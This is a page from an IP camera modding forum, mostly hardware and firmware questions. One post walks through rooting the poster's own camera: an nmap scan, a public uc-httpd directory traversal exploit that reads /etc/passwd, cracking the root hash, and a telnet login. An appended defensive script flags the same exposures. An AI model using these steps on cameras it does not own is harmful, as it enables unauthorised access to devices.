News:

Registered a URL and set up a forum, as the IPCam stuff really needed its own site vs my irregular blog posts about IPCam hacking at http://www.computersolutions.cn/blog

Recent Posts

22
Hacking & Modding / Re: In over my head/dumb questions
« Last post by admin on July 14, 2017, 02:13:09 am »
Really depends on the board you have, what GPIOs are available to use, and how much flash / RAM you have (for user space software etc).

Do you have the Hi3518e SoC SDK?

You'll need the SDK to get started, and to compile a ROM with kernel, userfs etc.
Maybe the supplier will give you a ready-to-use kernel/ROM/userfs that you can start from.

You'll need to have a uBoot on the board. Hopefully it will have one already, otherwise you'll also need an SPI flash programmer to program the uBoot.
You'll need to be able to set up a cross-compiler environment (suggest using Docker or a similar virtualized system to set it up, then you can migrate easily).
You'll need to unpack the SDK, then be able to compile the kernel.
You'll need to learn how to set up the ROM in flash.

Suggest reading the uCLinux posts from 2011 where I talk about similar things. It's relevant, although not 100% relevant to your particular board.


Also suggest reading other people's posts, e.g. https://felipe.astroza.cl/hacking-hi3518-based-ip-camera/

Good luck.

Might want to think about using something like an ESP8266 for your gimbal to control sensors, as that has wifi, and they're dirt cheap.
23
Firmware / Hi 3518E BLK18E-0012 50h10PE-WP Firmware
« Last post by winek0 on July 09, 2017, 04:00:13 am »
Hi, I have a problem with my camera: after the update it does not start. I am looking for firmware for it.



U-Boot 2010.06-svn (Oct 14 2015 - 15:07:23)

DRAM:  256 MiB
Check spi flash controller v350... Found
Spi(cs1) ID: 0xC2 0x20 0x17 0xC2 0x20 0x17
Spi(cs1): Block:64KB Chip:8MB Name:"MX25L6406E"
envcrc 0xd2097268
ENV_SIZE = 0xfffc
In:    serial
Out:   serial
Err:   serial
Press Ctrl+C to stop autoboot
CFG_BOOT_ADDR:0x58040000
8192 KiB hi_sfc at 0:0 is now current device

### boot load complete: 1973968 bytes loaded to 0x82000000
### SAVE TO 80008000 !
## Booting kernel from Legacy Image at 82000000 ...
   Image Name:   linux
   Image Type:   ARM Linux Kernel Image (uncompressed)
   Data Size:    1973904 Bytes = 1.9 MiB
   Load Address: 80008000
   Entry Point:  80008000


load=0x80008000,_bss_end=80829828,image_end=801e9e90,boot_sp=807c7168
   Loading Kernel Image ... OK
OK

Starting kernel ...

Uncompressing Linux... done, booting the kernel.



24
Hacking & Modding / In over my head/dumb questions
« Last post by salukikev on July 05, 2017, 01:55:27 am »
Hi guys,
I'm delighted to have discovered this forum recently as I'm expecting the arrival of a 32x32mm 720P IP camera tomorrow featuring the Hi3518E (https://www.alibaba.com/product-detail/720P-CMOS-Onivf-IP-module-H_60352228981.html).

I've read this is a popular configuration to access and hack the linux OS.   Unfortunately this is one part of a much larger project and I'm a terrible programmer only just getting familiar with Linux itself.  My focus has always been on mechanical items, but I'm familiar enough with electronics- this is still very new territory for me.  So apologies in advance for any ignorant questions.

1. The system that controls this camera will have two sets of coordinates for its 2-axis gimbal system.
2. Self-contained values for X & Z axis motors, I say self contained because values need not come from the Ethernet port, but rather from a MPU6050 sensor or similar, so yes- it will be trying to level itself out continuously.
3. The other set of values WILL need to come from the ethernet connection and they will constitute an offset value so that the camera can be driven to move from the other (leveling) values.

I realize that it is almost certain that I will need a separate microcontroller to handle this, but I thought that maybe at least the 2nd set of values could come through the IP camera board since it will already be networked, and will require negligible bandwidth, and I could thusly avoid all the complication of adding a separate board, ethernet hub/switch etc. etc. only to get a few PWM signals in there.  Space is at a premium for this application.

Short of that, I arrived here reading up on ways to reduce video latency.  This particular IP camera will go through a 10/100 mini ethernet media converter (fiber optic 9/125) as well.  Due to aforementioned size constraints I'm settling for 720p at 30fps even though I was shooting for at least 1080p.  This board in particular is only 32x32mm in physical size, so I've got that going for me, which is nice.   I'd welcome any suggestions on finding something smaller or higher resolution at that size (or actually a round PCB would be nice even though I don't expect to find that).   OR something of similar size with a remote image sensor (via flat ribbon cable).

Anyway, as you can see, I have a lot of different directions I can move on this project.  I'm funding this out of pocket right now, but if things work out I could turn a profit someday.  As such, I'd be willing to hire someone to help with this or possibly some equity arrangement- but short of that, I'd surely love some free advice and guidance before I spiral off on a tangent here.

Anyway, thanks in advance for any tips to get me moving toward a viable solution! Have a great day!
-Kevin


25
General Discussion / Re: Secure Methods Using PHP To display Your IP Camera
« Last post by OldRadioGuy on July 03, 2017, 05:49:26 pm »
Don's website is down.  Anybody have a copy of SecureImageDisplayV50.zip available?
26
Help / How I got root on my camera
« Last post by tanranger on July 02, 2017, 04:22:42 pm »
My camera uses a mobile app (Showmo) to use a China based cloud service for all device control. I tried to http directly to the camera with my browser but all I get is a blank listing of "Index of /mnt/web/".

So I did a bit of sleuthing and found this:

https://nmap.org/book/vscan.html

So I tried that out:

Code:
$ nmap -sV -T4 -F my.camera.ip.address

This reports the following:

Code:
Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-02 15:41 EDT
Nmap scan report for 192.168.1.121
Host is up (0.89s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  BusyBox telnetd
80/tcp open  http    uc-httpd 1.0.0
Service Info: Host: IPC365

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.67 seconds

So it's running uc-httpd 1.0.0.  Well a bit of googling later I come to learn that this is a httpd with a directory traversal bug.

https://packetstormsecurity.com/files/142131/XiongMai-uc-http-1.0.0-Local-File-Inclusion-Directory-Traversal.html

And there's a little python program provided to attack my camera.

Code:
$ python2 pwn.py http://192.168.1.121
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /etc/passwd
Exploiting.....


root:my-password-hash-here::/root:/bin/sh

So then I fed this into johntheripper with gpu acceleration and I got my root password in a few minutes.

Code:
$ telnet 192.168.1.121
Trying 192.168.1.121...
Connected to 192.168.1.121.
Escape character is '^]'.
IPC365 login: root
Password:
login: can't chdir to home directory '/root'
Welcome to

    _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.faraday.com/



BusyBox v1.19.4 (2014-12-19 12:49:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

So I poked around and learned this is a GM8136 device.

I noticed that an SDK for a similar chip was available on openipcam, so I used that filename as an example of the naming convention and searched for "GM8136 SDK release v1.0.rar" and discovered dozens of download links. I had to guess what a download button looks like in Chinese, but I figured it out.

Following the instructions in the SDK, I was able to crosscompile a full copy of busybox and get it into my /tmp/ directory and it works beautifully.

Poking around, I've learned the following:

Essentially all of the application code lives in an encrypted (blowfish-448) ELF which uses a common unix command as its filename (possibly to make googling harder). The encrypted ELF has formatted the SD card to the WFS0.4 encrypted filesystem so it can no longer be mounted and used to store my own application data between reboots. Also, whenever I try to kill the encrypted ELF process, the camera promptly reboots after a short delay.

So the punchline is that I have root over telnet, but I cannot access the camera output, my images, or my videos. I can run my own code, but I'm stuck for now with this mystery app that may or may not be adequately secured and could conceivably already be compromised with no way for me to tell.

One bit of good news is that /proc/config.gz is present if I decided to try to roll my own kernel.

So that's how I got this far. I hope my experience helps others to explore their own cameras.

Anyway, what now?
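
For anyone auditing their own cameras after reading the post above, here is an added example (not part of the original post) that parses `nmap -sV` text output and flags the two exposures the post found: an open telnet service and the uc-httpd 1.0.0 banner. The rule list and the second host in the sample are constructed for illustration.

```python
import re

# Constructed sample: the first host is copied from the scan in the post
# above; the second host is invented to show a clean result.
SAMPLE = """\
Nmap scan report for 192.168.1.121
Host is up (0.89s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  BusyBox telnetd
80/tcp open  http    uc-httpd 1.0.0
Service Info: Host: IPC365

Nmap scan report for 192.168.1.130
Host is up (0.01s latency).
PORT    STATE SERVICE VERSION
554/tcp open  rtsp    (constructed entry)
"""

# (field, pattern, reason). Rules cover only what the post reports.
RULES = [
    ("service", re.compile(r"^telnet$"), "telnet exposed (cleartext login)"),
    ("version", re.compile(r"\buc-httpd 1\.0\.0\b"),
     "uc-httpd 1.0.0 (directory traversal reported)"),
]

# Matches nmap port table rows such as "23/tcp open  telnet  BusyBox telnetd".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def audit(report):
    """Return {host: [(port, reason), ...]} for every host in the report."""
    findings, host = {}, None
    for line in report.splitlines():
        if line.startswith("Nmap scan report for "):
            # Handles both "1.2.3.4" and "name (1.2.3.4)" forms.
            host = line.rsplit(" ", 1)[-1].strip("()")
            findings[host] = []
            continue
        m = PORT_LINE.match(line)
        if not m or host is None or m.group(3) != "open":
            continue
        row = {"service": m.group(4), "version": m.group(5)}
        for field, pattern, reason in RULES:
            if pattern.search(row[field]):
                findings[host].append((int(m.group(1)), reason))
    return findings

if __name__ == "__main__":
    for host, hits in audit(SAMPLE).items():
        print(host, hits if hits else "no flagged services")
```

Cameras that get flagged are candidates for isolation on their own VLAN with no inbound access from the internet.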
27
Firmware / Re: Hi3516 Unknown command 'root' - try 'help'
« Last post by anil_argede on June 28, 2017, 03:23:33 am »
I'm pretty new to that module. I don't know how to do that. Can you help me if you know something?

Also I want to use this module for image processing. There are some OS in that. How can I change some files in it? I wanna do some image processing with it. I need to do modification and add some code to OS. Can I do that?
28
Firmware / Re: Hi3516 Unknown command 'root' - try 'help'
« Last post by admin on June 24, 2017, 05:00:51 am »
Not an error,  you're in the bootloader - u-boot.
You need to boot past that into the OS.


29
Firmware / Hi3516 Unknown command 'root' - try 'help'
« Last post by anil_argede on June 19, 2017, 06:41:23 am »
Hi everyone,
I tried to access the Hi3516 in my camera module. I followed a link to do this.
Link: https://felipe.astroza.cl/hacking-hi3518-based-ip-camera/
I wanna access root but got an error.


System startup


U-Boot 2010.06 (Jun 28 2016 - 09:04:41)

Check Flash Memory Controller v100 ... Found
SPI Nor(cs 0) ID: 0xc2 0x20 0x18
Block:64KB Chip:16MB Name:"MX25L128XX"
SPI Nor total size: 16MB
MMC:   
EMMC/MMC/SD controller initialization.
Card did not respond to voltage select!
No EMMC/MMC/SD device found !
In:    serial
Out:   serial
Err:   serial
Hit any key to stop autoboot:  1 ... 0
hisilicon #
hisilicon # root
Unknown command 'root' - try 'help'
hisilicon #
hisilicon #


Any ideas to solve this error? I apologize in advance for my English.
30
Help / Any instant on cameras?
« Last post by SlowBro on June 13, 2017, 03:49:47 pm »
Are there any cameras that come on very quickly, or which can be put in deep sleep mode to wake quickly?

I'd like to create a wire-free battery-powered motion sensing setup. The motion could be detected via IR sensor and a microcontroller could start up a camera. Images would be transmitted over Wi-Fi or cellular.

If the Foscam-style cams offer sleep mode that could work.